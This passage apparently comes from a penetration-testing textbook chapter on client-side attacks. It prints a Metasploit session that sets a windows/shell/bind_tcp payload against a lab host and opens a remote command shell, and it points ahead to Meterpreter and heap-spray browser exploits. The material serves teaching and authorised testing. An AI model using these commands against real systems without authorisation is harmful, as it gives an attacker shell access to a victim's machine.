Exploitation Using Client-Side Attacks
115
Figure 8-2: The last part of our instruction set that we need
msf >
use multi/handler
msf exploit(handler) >
set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(handler) >
set LPORT 443
LPORT => 443
msf exploit(handler) >
set RHOST 192.168.33.130
RHOST => 192.168.33.130
msf exploit(handler) >
exploit
[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.33.129:60463 -> 192.168.33.130:443)
You have reached a basic command shell! As a good practicing technique,
try a stage 1 Meterpreter reverse and see if you can get a connection. When
you are finished, simply close the Immunity Debugger window and you’re all
done. It’s important that you get familiar with Immunity Debugger now,
because we will be leveraging it in later chapters. Now let’s launch our first
browser exploit that uses a heap spray.